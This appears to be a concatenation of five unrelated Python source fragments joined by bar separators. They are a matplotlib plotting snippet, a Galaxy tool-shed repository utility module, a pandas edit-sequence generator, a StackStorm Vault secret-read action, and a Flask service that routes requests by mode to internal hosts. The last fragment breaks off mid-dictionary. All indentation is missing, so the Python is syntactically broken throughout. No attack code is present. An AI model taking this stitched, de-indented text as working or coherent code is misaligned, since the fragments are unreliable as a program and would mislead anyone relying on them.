plt.scatter(x=DF[24],y=DF[27]/10**3,s=1, c=rgba_colors)
plt.xlabel(r'WWT Type')
plt.xticks(rotation=75)
plt.ylabel(r'SCC (k\$/$m^2$)')
plt.ylim(-0.01, 0.1)
plt.savefig('SCC_vs_WWT_Integ_colorCoded.png', dpi=400, bbox_inches='tight')
plt.close('all')
#############################################
'''
print('plotting building mix traces')
# Building Mix trace plots
DFName = 'CCHP+WWT'
fig = plt.figure(figsize=(10,5))
ax = fig.add_subplot(111)
Num_Individuals = len(DFs[DFName])
cm = plt.get_cmap('rainbow')
ax.set_prop_cycle(color=[cm(1.*i/Num_Individuals) for i in range(Num_Individuals)])#ax.set_color_cycle([cm(1.*i/Num_Individuals) for i in range(Num_Individuals)])
for i in range(Num_Individuals):
ax.plot(['Res','Off','Com','Ind','Hos','Med','Edu'],
DFs[DFName].iloc[i,29:36],linewidth=0.2, alpha=0.5)
ax.set_xlabel('Building-Use')
ax.set_ylabel('Percent of Total GFA (%)')
plt.ylim(0, 100)
fig.savefig('Uses_Integ.png', dpi=400, bbox_inches='tight')
DFName = 'CCHP|CWWTP'
fig = plt.figure(figsize=(10,5))
ax = fig.add_subplot(111)
Num_Individuals = len(DFs[DFName])
cm = plt.get_cmap('rainbow')
ax.set_prop_cycle(color=[cm(1.*i/Num_Individuals) for i in range(Num_Individuals)])#ax.set_color_cycle([cm(1.*i/Num_Individuals) for i in range(Num_Individuals)])
y_array = np.array(DFs[DFName].iloc[:,29:36])
for i in range(Num_Individuals):
ax.plot(['Res','Off','Com','Ind','Hos','Med','Edu'],
DFs[DFName].iloc[i,29:36],linewidth=0.2, alpha=0.5)
ax.set_xlabel('Building-Use')
ax.set_ylabel('Percent of Total GFA (%)')
plt.ylim(0, 100)
fig.savefig('Uses_Disinteg.png', dpi=400, bbox_inches='tight')
plt.close('all')
'''
|
import logging
import os
import re
import shutil
from urllib.error import HTTPError
from markupsafe import escape
from sqlalchemy import (
and_,
false,
or_,
)
from sqlalchemy.orm import joinedload
from galaxy import util
from galaxy import web
from galaxy.tool_shed.util import basic_util
from galaxy.util.tool_shed import common_util, encoding_util
log = logging.getLogger(__name__)
VALID_REPOSITORYNAME_RE = re.compile(r"^[a-z0-9\_]+$")
def check_for_updates(app, model, repository_id=None):
message = ''
status = 'ok'
if repository_id is None:
success_count = 0
repository_names_not_updated = []
updated_count = 0
for repository in model.context.query(model.ToolShedRepository) \
.filter(model.ToolShedRepository.table.c.deleted == false()):
ok, updated = \
check_or_update_tool_shed_status_for_installed_repository(app, repository)
if ok:
success_count += 1
else:
repository_names_not_updated.append(f'<b>{escape(str(repository.name))}</b>')
if updated:
updated_count += 1
message = "Checked the status in the tool shed for %d repositories. " % success_count
message += "Updated the tool shed status for %d repositories. " % updated_count
if repository_names_not_updated:
message += "Unable to retrieve status from the tool shed for the following repositories:\n"
message += ", ".join(repository_names_not_updated)
else:
repository = get_tool_shed_repository_by_id(app, repository_id)
ok, updated = \
check_or_update_tool_shed_status_for_installed_repository(app, repository)
if ok:
if updated:
message = f"The tool shed status for repository <b>{escape(str(repository.name))}</b> has been updated."
else:
message = f"The status has not changed in the tool shed for repository <b>{escape(str(repository.name))}</b>."
else:
message = f"Unable to retrieve status from the tool shed for repository <b>{escape(str(repository.name))}</b>."
status = 'error'
return message, status
def check_or_update_tool_shed_status_for_installed_repository(app, repository):
updated = False
tool_shed_status_dict = get_tool_shed_status_for_installed_repository(app, repository)
if tool_shed_status_dict:
ok = True
if tool_shed_status_dict != repository.tool_shed_status:
repository.tool_shed_status = tool_shed_status_dict
app.install_model.context.add(repository)
app.install_model.context.flush()
updated = True
else:
ok = False
return ok, updated
def create_or_update_tool_shed_repository(app, name, description, installed_changeset_revision, ctx_rev, repository_clone_url,
status, metadata_dict=None, current_changeset_revision=None, owner='', dist_to_shed=False):
"""
Update a tool shed repository record in the Galaxy database with the new information received.
If a record defined by the received tool shed, repository name and owner does not exist, create
a new record with the received information.
"""
metadata_dict = metadata_dict or {}
# The received value for dist_to_shed will be True if the ToolMigrationManager is installing a repository
# that contains tools or datatypes that used to be in the Galaxy distribution, but have been moved
# to the main Galaxy tool shed.
if current_changeset_revision is None:
# The current_changeset_revision is not passed if a repository is being installed for the first
# time. If a previously installed repository was later uninstalled, this value should be received
# as the value of that change set to which the repository had been updated just prior to it being
# uninstalled.
current_changeset_revision = installed_changeset_revision
context = app.install_model.context
tool_shed = get_tool_shed_from_clone_url(repository_clone_url)
if not owner:
owner = get_repository_owner_from_clone_url(repository_clone_url)
includes_datatypes = 'datatypes' in metadata_dict
if status in [app.install_model.ToolShedRepository.installation_status.DEACTIVATED]:
deleted = True
uninstalled = False
elif status in [app.install_model.ToolShedRepository.installation_status.UNINSTALLED]:
deleted = True
uninstalled = True
else:
deleted = False
uninstalled = False
tool_shed_repository = \
get_installed_repository(app, tool_shed=tool_shed, name=name, owner=owner, installed_changeset_revision=installed_changeset_revision)
if tool_shed_repository:
log.debug("Updating an existing row for repository '%s' in the tool_shed_repository table, status set to '%s'.", name, status)
tool_shed_repository.description = description
tool_shed_repository.changeset_revision = current_changeset_revision
tool_shed_repository.ctx_rev = ctx_rev
tool_shed_repository.metadata_ = metadata_dict
tool_shed_repository.includes_datatypes = includes_datatypes
tool_shed_repository.deleted = deleted
tool_shed_repository.uninstalled = uninstalled
tool_shed_repository.status = status
else:
log.debug("Adding new row for repository '%s' in the tool_shed_repository table, status set to '%s'.", name, status)
tool_shed_repository = \
app.install_model.ToolShedRepository(tool_shed=tool_shed,
name=name,
description=description,
owner=owner,
installed_changeset_revision=installed_changeset_revision,
changeset_revision=current_changeset_revision,
ctx_rev=ctx_rev,
metadata_=metadata_dict,
includes_datatypes=includes_datatypes,
dist_to_shed=dist_to_shed,
deleted=deleted,
uninstalled=uninstalled,
status=status)
context.add(tool_shed_repository)
context.flush()
return tool_shed_repository
def extract_components_from_tuple(repository_components_tuple):
'''Extract the repository components from the provided tuple in a backward-compatible manner.'''
toolshed = repository_components_tuple[0]
name = repository_components_tuple[1]
owner = repository_components_tuple[2]
changeset_revision = repository_components_tuple[3]
components_list = [toolshed, name, owner, changeset_revision]
if len(repository_components_tuple) == 5:
toolshed, name, owner, changeset_revision, prior_installation_required = repository_components_tuple
components_list = [toolshed, name, owner, changeset_revision, prior_installation_required]
elif len(repository_components_tuple) == 6:
toolshed, name, owner, changeset_revision, prior_installation_required, only_if_compiling_contained_td = repository_components_tuple
components_list = [toolshed, name, owner, changeset_revision, prior_installation_required, only_if_compiling_contained_td]
return components_list
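# Illustrative example of the tuple handling above (the values are made up for illustration):
#   extract_components_from_tuple(('toolshed.example.org', 'column_maker', 'devteam', 'abc123'))
#   -> ['toolshed.example.org', 'column_maker', 'devteam', 'abc123']
# A 5-tuple additionally yields prior_installation_required, and a 6-tuple also yields
# only_if_compiling_contained_td, in that order.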
def generate_tool_shed_repository_install_dir(repository_clone_url, changeset_revision):
"""
Generate a repository installation directory that guarantees repositories with the same
name will always be installed in different directories. The tool path will be of the form:
<tool shed url>/repos/<repository owner>/<repository name>/<installed changeset revision>
"""
tmp_url = common_util.remove_protocol_and_user_from_clone_url(repository_clone_url)
# Now tmp_url is something like: bx.psu.edu:9009/repos/some_username/column
items = tmp_url.split('/repos/')
tool_shed_url = items[0]
repo_path = items[1]
tool_shed_url = common_util.remove_port_from_tool_shed_url(tool_shed_url)
return '/'.join((tool_shed_url, 'repos', repo_path, changeset_revision))
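# Example of the resulting install dir (a sketch only; the clone URL follows the pattern in the
# comment above and the changeset revision is made up):
#   generate_tool_shed_repository_install_dir('http://bx.psu.edu:9009/repos/some_username/column', 'abc123')
#   -> 'bx.psu.edu/repos/some_username/column/abc123'   (the port is stripped from the tool shed URL)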
def get_absolute_path_to_file_in_repository(repo_files_dir, file_name):
"""Return the absolute path to a specified disk file contained in a repository."""
stripped_file_name = basic_util.strip_path(file_name)
file_path = None
for root, _, files in os.walk(repo_files_dir):
if root.find('.hg') < 0:
for name in files:
if name == stripped_file_name:
return os.path.abspath(os.path.join(root, name))
return file_path
def get_ids_of_tool_shed_repositories_being_installed(app, as_string=False):
installing_repository_ids = []
new_status = app.install_model.ToolShedRepository.installation_status.NEW
cloning_status = app.install_model.ToolShedRepository.installation_status.CLONING
setting_tool_versions_status = app.install_model.ToolShedRepository.installation_status.SETTING_TOOL_VERSIONS
installing_dependencies_status = app.install_model.ToolShedRepository.installation_status.INSTALLING_TOOL_DEPENDENCIES
loading_datatypes_status = app.install_model.ToolShedRepository.installation_status.LOADING_PROPRIETARY_DATATYPES
for tool_shed_repository in \
app.install_model.context.query(app.install_model.ToolShedRepository) \
.filter(or_(app.install_model.ToolShedRepository.status == new_status,
app.install_model.ToolShedRepository.status == cloning_status,
app.install_model.ToolShedRepository.status == setting_tool_versions_status,
app.install_model.ToolShedRepository.status == installing_dependencies_status,
app.install_model.ToolShedRepository.status == loading_datatypes_status)):
installing_repository_ids.append(app.security.encode_id(tool_shed_repository.id))
if as_string:
return ','.join(installing_repository_ids)
return installing_repository_ids
def get_installed_repository(app, tool_shed=None, name=None, owner=None, changeset_revision=None, installed_changeset_revision=None, repository_id=None, from_cache=False):
"""
Return a tool shed repository database record defined by the combination of a toolshed, repository name,
repository owner and either current or originally installed changeset_revision.
"""
# We store the port, if one exists, in the database.
tool_shed = common_util.remove_protocol_from_tool_shed_url(tool_shed)
if from_cache:
tsr_cache = getattr(app, 'tool_shed_repository_cache', None)
if tsr_cache:
return app.tool_shed_repository_cache.get_installed_repository(
tool_shed=tool_shed,
name=name,
owner=owner,
installed_changeset_revision=installed_changeset_revision,
changeset_revision=changeset_revision,
repository_id=repository_id
)
query = app.install_model.context.query(app.install_model.ToolShedRepository)
if repository_id:
clause_list = [app.install_model.ToolShedRepository.table.c.id == repository_id]
else:
clause_list = [app.install_model.ToolShedRepository.table.c.tool_shed == tool_shed,
app.install_model.ToolShedRepository.table.c.name == name,
app.install_model.ToolShedRepository.table.c.owner == owner]
if changeset_revision is not None:
clause_list.append(app.install_model.ToolShedRepository.table.c.changeset_revision == changeset_revision)
if installed_changeset_revision is not None:
clause_list.append(app.install_model.ToolShedRepository.table.c.installed_changeset_revision == installed_changeset_revision)
return query.filter(and_(*clause_list)).first()
def get_installed_tool_shed_repository(app, id):
"""Get a tool shed repository record from the Galaxy database defined by the id."""
rval = []
if isinstance(id, list):
return_list = True
else:
id = [id]
return_list = False
repository_ids = [app.security.decode_id(i) for i in id]
rval = [get_installed_repository(app=app, repository_id=repo_id, from_cache=False) for repo_id in repository_ids]
if return_list:
return rval
return rval[0]
def get_prior_import_or_install_required_dict(app, tsr_ids, repo_info_dicts):
"""
This method is used in the Tool Shed when exporting a repository and its dependencies,
and in Galaxy when a repository and its dependencies are being installed. Return a
dictionary whose keys are the received tsr_ids and whose values are a list of tsr_ids,
each of which is contained in the received list of tsr_ids and whose associated repository
must be imported or installed prior to the repository associated with the tsr_id key.
"""
# Initialize the dictionary.
prior_import_or_install_required_dict = {}
for tsr_id in tsr_ids:
prior_import_or_install_required_dict[tsr_id] = []
# Inspect the repository dependencies for each repository about to be installed and populate the dictionary.
for repo_info_dict in repo_info_dicts:
repository, repository_dependencies = get_repository_and_repository_dependencies_from_repo_info_dict(app, repo_info_dict)
if repository:
encoded_repository_id = app.security.encode_id(repository.id)
if encoded_repository_id in tsr_ids:
# We've located the database table record for one of the repositories we're about to install, so find out if it has any repository
# dependencies that require prior installation.
prior_import_or_install_ids = get_repository_ids_requiring_prior_import_or_install(app, tsr_ids, repository_dependencies)
prior_import_or_install_required_dict[encoded_repository_id] = prior_import_or_install_ids
return prior_import_or_install_required_dict
def get_repo_info_tuple_contents(repo_info_tuple):
"""Take care in handling the repo_info_tuple as it evolves over time as new tool shed features are introduced."""
if len(repo_info_tuple) == 6:
description, repository_clone_url, changeset_revision, ctx_rev, repository_owner, tool_dependencies = repo_info_tuple
repository_dependencies = None
elif len(repo_info_tuple) == 7:
description, repository_clone_url, changeset_revision, ctx_rev, repository_owner, repository_dependencies, tool_dependencies = repo_info_tuple
return description, repository_clone_url, changeset_revision, ctx_rev, repository_owner, repository_dependencies, tool_dependencies
def get_repository_admin_role_name(repository_name, repository_owner):
return f'{str(repository_name)}_{str(repository_owner)}_admin'
def get_repository_and_repository_dependencies_from_repo_info_dict(app, repo_info_dict):
"""Return a tool_shed_repository or repository record defined by the information in the received repo_info_dict."""
repository_name = list(repo_info_dict.keys())[0]
repo_info_tuple = repo_info_dict[repository_name]
description, repository_clone_url, changeset_revision, ctx_rev, repository_owner, repository_dependencies, tool_dependencies = \
get_repo_info_tuple_contents(repo_info_tuple)
if hasattr(app, "install_model"):
        # We're in a tool shed client (Galaxy, or something that installs repositories the way Galaxy does).
tool_shed = get_tool_shed_from_clone_url(repository_clone_url)
repository = get_repository_for_dependency_relationship(app, tool_shed, repository_name, repository_owner, changeset_revision)
else:
# We're in the tool shed.
repository = get_repository_by_name_and_owner(app, repository_name, repository_owner)
return repository, repository_dependencies
def get_repository_by_id(app, id):
"""Get a repository from the database via id."""
if is_tool_shed_client(app):
return app.install_model.context.query(app.install_model.ToolShedRepository).get(app.security.decode_id(id))
else:
sa_session = app.model.session
return sa_session.query(app.model.Repository).get(app.security.decode_id(id))
def get_repository_by_name_and_owner(app, name, owner, eagerload_columns=None):
"""Get a repository from the database via name and owner"""
repository_query = get_repository_query(app)
if is_tool_shed_client(app):
return repository_query \
.filter(and_(app.install_model.ToolShedRepository.table.c.name == name,
app.install_model.ToolShedRepository.table.c.owner == owner)) \
.first()
# We're in the tool shed.
q = repository_query.filter(
and_(
app.model.Repository.table.c.name == name,
app.model.User.table.c.username == owner,
app.model.Repository.table.c.user_id == app.model.User.table.c.id
)
)
if eagerload_columns:
q = q.options(joinedload(*eagerload_columns))
return q.first()
def get_repository_by_name(app, name):
"""Get a repository from the database via name."""
return get_repository_query(app).filter_by(name=name).first()
def get_repository_dependency_types(repository_dependencies):
"""
Inspect the received list of repository_dependencies tuples and return boolean values
for has_repository_dependencies and has_repository_dependencies_only_if_compiling_contained_td.
"""
# Set has_repository_dependencies, which will be True only if at least one repository_dependency
# is defined with the value of
# only_if_compiling_contained_td as False.
has_repository_dependencies = False
for rd_tup in repository_dependencies:
tool_shed, name, owner, changeset_revision, prior_installation_required, only_if_compiling_contained_td = \
common_util.parse_repository_dependency_tuple(rd_tup)
if not util.asbool(only_if_compiling_contained_td):
has_repository_dependencies = True
break
# Set has_repository_dependencies_only_if_compiling_contained_td, which will be True only if at
# least one repository_dependency is defined with the value of only_if_compiling_contained_td as True.
has_repository_dependencies_only_if_compiling_contained_td = False
for rd_tup in repository_dependencies:
tool_shed, name, owner, changeset_revision, prior_installation_required, only_if_compiling_contained_td = \
common_util.parse_repository_dependency_tuple(rd_tup)
if util.asbool(only_if_compiling_contained_td):
has_repository_dependencies_only_if_compiling_contained_td = True
break
return has_repository_dependencies, has_repository_dependencies_only_if_compiling_contained_td
def get_repository_for_dependency_relationship(app, tool_shed, name, owner, changeset_revision):
"""
Return an installed tool_shed_repository database record that is defined by either the current changeset
revision or the installed_changeset_revision.
"""
# This method is used only in Galaxy, not the Tool Shed. We store the port (if one exists) in the database.
tool_shed = common_util.remove_protocol_from_tool_shed_url(tool_shed)
if tool_shed is None or name is None or owner is None or changeset_revision is None:
message = "Unable to retrieve the repository record from the database because one or more of the following "
message += "required parameters is None: tool_shed: %s, name: %s, owner: %s, changeset_revision: %s " % \
(str(tool_shed), str(name), str(owner), str(changeset_revision))
raise Exception(message)
repository = get_installed_repository(app=app,
tool_shed=tool_shed,
name=name,
owner=owner,
installed_changeset_revision=changeset_revision)
if not repository:
repository = get_installed_repository(app=app,
tool_shed=tool_shed,
name=name,
owner=owner,
changeset_revision=changeset_revision)
if not repository:
tool_shed_url = common_util.get_tool_shed_url_from_tool_shed_registry(app, tool_shed)
repository_clone_url = os.path.join(tool_shed_url, 'repos', owner, name)
repo_info_tuple = (None, repository_clone_url, changeset_revision, None, owner, None, None)
repository, pcr = repository_was_previously_installed(app, tool_shed_url, name, repo_info_tuple)
if not repository:
# The received changeset_revision is no longer installable, so get the next changeset_revision
# in the repository's changelog in the tool shed that is associated with repository_metadata.
tool_shed_url = common_util.get_tool_shed_url_from_tool_shed_registry(app, tool_shed)
params = dict(name=name, owner=owner, changeset_revision=changeset_revision)
pathspec = ['repository', 'next_installable_changeset_revision']
text = util.url_get(tool_shed_url, auth=app.tool_shed_registry.url_auth(tool_shed_url), pathspec=pathspec, params=params)
if text:
repository = get_installed_repository(app=app,
tool_shed=tool_shed,
name=name,
owner=owner,
changeset_revision=text)
return repository
def get_repository_ids_requiring_prior_import_or_install(app, tsr_ids, repository_dependencies):
"""
This method is used in the Tool Shed when exporting a repository and its dependencies,
and in Galaxy when a repository and its dependencies are being installed. Inspect the
received repository_dependencies and determine if the encoded id of each required
repository is in the received tsr_ids. If so, then determine whether that required
repository should be imported / installed prior to its dependent repository. Return a
list of encoded repository ids, each of which is contained in the received list of tsr_ids,
and whose associated repositories must be imported / installed prior to the dependent
repository associated with the received repository_dependencies.
"""
prior_tsr_ids = []
if repository_dependencies:
for key, rd_tups in repository_dependencies.items():
if key in ['description', 'root_key']:
continue
for rd_tup in rd_tups:
tool_shed, \
name, \
owner, \
changeset_revision, \
prior_installation_required, \
only_if_compiling_contained_td = \
common_util.parse_repository_dependency_tuple(rd_tup)
# If only_if_compiling_contained_td is False, then the repository dependency
# is not required to be installed prior to the dependent repository even if
# prior_installation_required is True. This is because the only meaningful
# content of the repository dependency is its contained tool dependency, which
# is required in order to compile the dependent repository's tool dependency.
# In the scenario where the repository dependency is not installed prior to the
# dependent repository's tool dependency compilation process, the tool dependency
# compilation framework will install the repository dependency prior to compilation
# of the dependent repository's tool dependency.
if not util.asbool(only_if_compiling_contained_td):
if util.asbool(prior_installation_required):
if is_tool_shed_client(app):
# We store the port, if one exists, in the database.
tool_shed = common_util.remove_protocol_from_tool_shed_url(tool_shed)
repository = get_repository_for_dependency_relationship(app,
tool_shed,
name,
owner,
changeset_revision)
else:
repository = get_repository_by_name_and_owner(app, name, owner)
if repository:
encoded_repository_id = app.security.encode_id(repository.id)
if encoded_repository_id in tsr_ids:
prior_tsr_ids.append(encoded_repository_id)
return prior_tsr_ids
def get_repository_in_tool_shed(app, id, eagerload_columns=None):
"""Get a repository on the tool shed side from the database via id."""
q = get_repository_query(app)
if eagerload_columns:
q = q.options(joinedload(*eagerload_columns))
return q.get(app.security.decode_id(id))
def get_repository_owner(cleaned_repository_url):
"""Gvien a "cleaned" repository clone URL, return the owner of the repository."""
items = cleaned_repository_url.split('/repos/')
repo_path = items[1]
if repo_path.startswith('/'):
repo_path = repo_path.replace('/', '', 1)
return repo_path.lstrip('/').split('/')[0]
def get_repository_owner_from_clone_url(repository_clone_url):
"""Given a repository clone URL, return the owner of the repository."""
tmp_url = common_util.remove_protocol_and_user_from_clone_url(repository_clone_url)
return get_repository_owner(tmp_url)
def get_repository_query(app):
if is_tool_shed_client(app):
query = app.install_model.context.query(app.install_model.ToolShedRepository)
else:
query = app.model.context.query(app.model.Repository)
return query
def get_role_by_id(app, role_id):
"""Get a Role from the database by id."""
sa_session = app.model.session
return sa_session.query(app.model.Role).get(app.security.decode_id(role_id))
def get_tool_shed_from_clone_url(repository_clone_url):
tmp_url = common_util.remove_protocol_and_user_from_clone_url(repository_clone_url)
return tmp_url.split('/repos/')[0].rstrip('/')
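# Clone-URL parsing sketch (the URL matches the example given in the comment inside
# generate_tool_shed_repository_install_dir above):
#   get_tool_shed_from_clone_url('http://bx.psu.edu:9009/repos/some_username/column')
#   -> 'bx.psu.edu:9009'
#   get_repository_owner_from_clone_url('http://bx.psu.edu:9009/repos/some_username/column')
#   -> 'some_username'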
def get_tool_shed_repository_by_id(app, repository_id):
"""Return a tool shed repository database record defined by the id."""
# This method is used only in Galaxy, not the tool shed.
return app.install_model.context.query(app.install_model.ToolShedRepository) \
.filter(app.install_model.ToolShedRepository.table.c.id == app.security.decode_id(repository_id)) \
.first()
def get_tool_shed_status_for_installed_repository(app, repository):
"""
Send a request to the tool shed to retrieve information about newer installable repository revisions,
current revision updates, whether the repository revision is the latest downloadable revision, and
whether the repository has been deprecated in the tool shed. The received repository is a ToolShedRepository
object from Galaxy.
"""
tool_shed_url = common_util.get_tool_shed_url_from_tool_shed_registry(app, str(repository.tool_shed))
params = dict(name=repository.name, owner=repository.owner, changeset_revision=repository.changeset_revision)
pathspec = ['repository', 'status_for_installed_repository']
try:
encoded_tool_shed_status_dict = util.url_get(tool_shed_url, auth=app.tool_shed_registry.url_auth(tool_shed_url), pathspec=pathspec, params=params)
tool_shed_status_dict = encoding_util.tool_shed_decode(encoded_tool_shed_status_dict)
return tool_shed_status_dict
except HTTPError as e:
        # This should handle backward compatibility to the Galaxy 12/20/12 release. We used to only handle updates for an installed revision
# using a boolean value.
log.debug("Error attempting to get tool shed status for installed repository %s: %s\nAttempting older 'check_for_updates' method.\n" %
(str(repository.name), str(e)))
pathspec = ['repository', 'check_for_updates']
params['from_update_manager'] = True
try:
# The value of text will be 'true' or 'false', depending upon whether there is an update available for the installed revision.
text = util.url_get(tool_shed_url, auth=app.tool_shed_registry.url_auth(tool_shed_url), pathspec=pathspec, params=params)
return dict(revision_update=text)
except Exception:
# The required tool shed may be unavailable, so default the revision_update value to 'false'.
return dict(revision_update='false')
except Exception:
log.exception("Error attempting to get tool shed status for installed repository %s", str(repository.name))
return {}
def is_tool_shed_client(app):
"""
    The tool shed and clients to the tool shed (i.e. Galaxy) require a lot
of similar functionality in this file but with small differences. This
method should determine if the app performing the action is the tool shed
or a client of the tool shed.
"""
return hasattr(app, "install_model")
def repository_was_previously_installed(app, tool_shed_url, repository_name, repo_info_tuple, from_tip=False):
"""
Find out if a repository is already installed into Galaxy - there are several scenarios where this
is necessary. For example, this method will handle the case where the repository was previously
    installed using an older changeset_revision, but later the repository was updated in the tool shed
and now we're trying to install the latest changeset revision of the same repository instead of
updating the one that was previously installed. We'll look in the database instead of on disk since
the repository may be currently uninstalled.
"""
tool_shed_url = common_util.get_tool_shed_url_from_tool_shed_registry(app, tool_shed_url)
description, repository_clone_url, changeset_revision, ctx_rev, repository_owner, repository_dependencies, tool_dependencies = \
get_repo_info_tuple_contents(repo_info_tuple)
tool_shed = get_tool_shed_from_clone_url(repository_clone_url)
# See if we can locate the repository using the value of changeset_revision.
tool_shed_repository = get_installed_repository(app,
tool_shed=tool_shed,
name=repository_name,
owner=repository_owner,
installed_changeset_revision=changeset_revision)
if tool_shed_repository:
return tool_shed_repository, changeset_revision
# Get all previous changeset revisions from the tool shed for the repository back to, but excluding,
# the previous valid changeset revision to see if it was previously installed using one of them.
params = dict(galaxy_url=web.url_for('/', qualified=True),
name=repository_name,
owner=repository_owner,
changeset_revision=changeset_revision,
from_tip=str(from_tip))
pathspec = ['repository', 'previous_changeset_revisions']
text = util.url_get(tool_shed_url, auth=app.tool_shed_registry.url_auth(tool_shed_url), pathspec=pathspec, params=params)
if text:
changeset_revisions = util.listify(text)
for previous_changeset_revision in changeset_revisions:
tool_shed_repository = get_installed_repository(app,
tool_shed=tool_shed,
name=repository_name,
owner=repository_owner,
installed_changeset_revision=previous_changeset_revision)
if tool_shed_repository:
return tool_shed_repository, previous_changeset_revision
return None, None
def set_repository_attributes(app, repository, status, error_message, deleted, uninstalled, remove_from_disk=False):
if remove_from_disk:
relative_install_dir = repository.repo_path(app)
if relative_install_dir:
clone_dir = os.path.abspath(relative_install_dir)
try:
shutil.rmtree(clone_dir)
log.debug("Removed repository installation directory: %s", clone_dir)
except Exception as e:
log.debug("Error removing repository installation directory %s: %s", clone_dir, util.unicodify(e))
repository.error_message = error_message
repository.status = status
repository.deleted = deleted
repository.uninstalled = uninstalled
app.install_model.context.add(repository)
app.install_model.context.flush()
__all__ = (
'check_for_updates',
'check_or_update_tool_shed_status_for_installed_repository',
'create_or_update_tool_shed_repository',
'extract_components_from_tuple',
'generate_tool_shed_repository_install_dir',
'get_absolute_path_to_file_in_repository',
'get_ids_of_tool_shed_repositories_being_installed',
'get_installed_repository',
'get_installed_tool_shed_repository',
'get_prior_import_or_install_required_dict',
'get_repo_info_tuple_contents',
'get_repository_admin_role_name',
'get_repository_and_repository_dependencies_from_repo_info_dict',
'get_repository_by_id',
'get_repository_by_name',
'get_repository_by_name_and_owner',
'get_repository_dependency_types',
'get_repository_for_dependency_relationship',
'get_repository_ids_requiring_prior_import_or_install',
'get_repository_in_tool_shed',
'get_repository_owner',
'get_repository_owner_from_clone_url',
'get_repository_query',
'get_role_by_id',
'get_tool_shed_from_clone_url',
'get_tool_shed_repository_by_id',
'get_tool_shed_status_for_installed_repository',
'is_tool_shed_client',
'repository_was_previously_installed',
'set_repository_attributes',
)
|
import pandas as pd
from itertools import groupby
from operator import itemgetter
class SequenceGenerator:
def __init__(self, csvfile, jsThreshold):
self.datafile = csvfile
self.jsThreshold = jsThreshold
"""
Convert the input csv file into dataframe
"""
def _csv2df(self):
return pd.read_csv(self.datafile, dtype={'item_id':int, 'user_id':str})
"""
Generate database by selecting the non-null sequences satisfying the js-distance threshold
"""
def generate_db(self):
db = self._csv2df()[['item_id', 'user_id', 'edit_type', 'rev_timestamp', 'js_distance']].sort_values(by=['item_id','rev_timestamp'])
filter = db.loc[db['js_distance'] >= self.jsThreshold][['item_id', 'user_id', 'edit_type']]
return filter[filter.user_id.notnull()]
def generate_dev_db(self, dev):
db = self._csv2df()[['item_id', 'user_id', 'edit_type', 'rev_timestamp', 'prediction', 'js_distance']].sort_values(by=['item_id', 'rev_timestamp'])
filter = db.loc[(db['js_distance']>=self.jsThreshold) & (db['prediction']==dev)][['item_id', 'user_id', 'edit_type']]
return filter[filter.user_id.notnull()]
"""
Generate the sequence database by integrating all edits conducted upon one article in a list, where
the serial edits from the same editor are collapsed into one sub-list
Args:
csv file of scheme: article_id : int
editor_id : int
edit_type : string
Return:
A list of list [[a], [b]], where a and b are collapsed edit types
"""
def generate_sequence(self):
db = self.generate_db()
df = db.groupby(['item_id', 'user_id']).agg({'edit_type': list})
result = df.groupby(['item_id']).agg({'edit_type': list})
tmp = []
for ls in result.values.tolist():
tmp.append(ls[0])
return tmp
def generate_dev_sequence(self, dev):
db = self.generate_dev_db(dev=dev)
df = db.groupby(['item_id', 'user_id']).agg({'edit_type': list})
return df.values.tolist()
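# Minimal usage sketch (the CSV path and threshold are hypothetical; the file must provide the
# columns item_id, user_id, edit_type, rev_timestamp, js_distance and, for the dev variant, prediction):
#   generator = SequenceGenerator('edit_history.csv', jsThreshold=0.1)
#   sequences = generator.generate_sequence()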
|
from lib import action
class VaultReadAction(action.VaultBaseAction):
def run(self, path, kv_version, mount_point, version):
value = None
if kv_version == 1:
value = self.vault.kv.v1.read_secret(path=path, mount_point=mount_point)
elif kv_version == 2:
value = self.vault.kv.v2.read_secret_version(path=path, mount_point=mount_point,
version=version)
if value:
return value['data']
else:
raise KeyError("Key was not found in Vault")
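# Behaviour sketch: run() picks the KV v1 or v2 read call based on kv_version and returns the
# 'data' section of the Vault response, raising KeyError if nothing is found. The parameter
# values below are hypothetical, and instantiation is handled by the StackStorm runner:
#   run(path='app/db', kv_version=2, mount_point='secret', version=None)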
|
#!/home/zhuqingjie/env/py3_tf_low/bin/python
'''
@Time    : 07.26 0026 01:19 PM
@Author : zhuqingjie
@User : zhu
@FileName: control.py
@Software: PyCharm
'''
'''
Overall control logic:
1. control exposes only one port to the outside; external clients send requests to control, and control dispatches to the other server modules according to mode.
2. This also solves the problem that the AI nodes cannot be reached directly from outside: the main services run on the AI nodes, while the control service runs on the login node, so external clients can reach it.
'''
import json, os, requests, sys, time
from flask import Flask, request
# param
ai01_ip = '10.11.1.81'
ai02_ip = '10.11.1.82'
ai03_ip = '10.11.1.83'
ai04_ip = '10.11.1.84'
ai05_ip = '10.11.1.85'
IP = ai05_ip  # IP address of the main service
app = Flask(__name__)
print_ = lambda x: print(f"--> [{time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))}]: {x}")
printc = lambda s: print(f"\033[1;35m{s}\033[0m")
mode_list = ['1', '2', '21', '22', '3', '4', '5', '51', '6']
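# For reference, the mode -> port mapping implemented by handle() below, written out as a
# table (a summary only; the handler keeps the explicit if/elif chain):
#   '1' -> 9001, '2' -> 9002, '21' -> 9021, '22' -> 9022, '3' -> 9003,
#   '4' -> 9004, '5' -> 9005, '51' -> 9051, '6' -> 9006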
def do_request(port, body):
url = f'http://{IP}:{port}'
printc(url)
printc(body)
response = requests.post(url, data=body)
printc('do_request ok')
return response.text
@app.route('/', methods=['POST'])
def handle():
print('\n')
print('-' * 50)
print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))
    # Read the request parameters
dic_url = request.form
print_(f'\n\tparams: {dic_url}')
error_param = 'error_param'
mode = dic_url.get('mode', error_param)
if mode == error_param:
return json.dumps({
'status': -1,
            'info': 'param error: "mode" not found!',
'dst_path': 'null',
})
elif mode not in mode_list:
return json.dumps({
'status': -1,
'info': 'param error: "mode" must in 1-6!',
'dst_path': 'null',
})
elif mode == '1':
return do_request(9001, dic_url)
elif mode == '2':
return do_request(9002, dic_url)
elif mode == '21':
return do_request(9021, dic_url)
elif mode == '22':
return do_request(9022, dic_url)
elif mode == '3':
return do_request(9003, dic_url)
elif mode == '4':
return do_request(9004, dic_url)
elif mode == '5':
return do_request(9005, dic_url)
elif mode == '51':
return do_request(9051, dic_url)
elif mode == '6':
return do_request(9006, dic_url)
# elif mode in ['10', '11']:
# return do_request(9010, dic_url)
else:
return json.dumps({
'status': 2,
'info': 'error: An impossible error.',
'dst_path': 'null',
})
if __name__ == '__main__':
# app.run(host='0.0.0.0', port='7006')
body = {
'mode': '1',
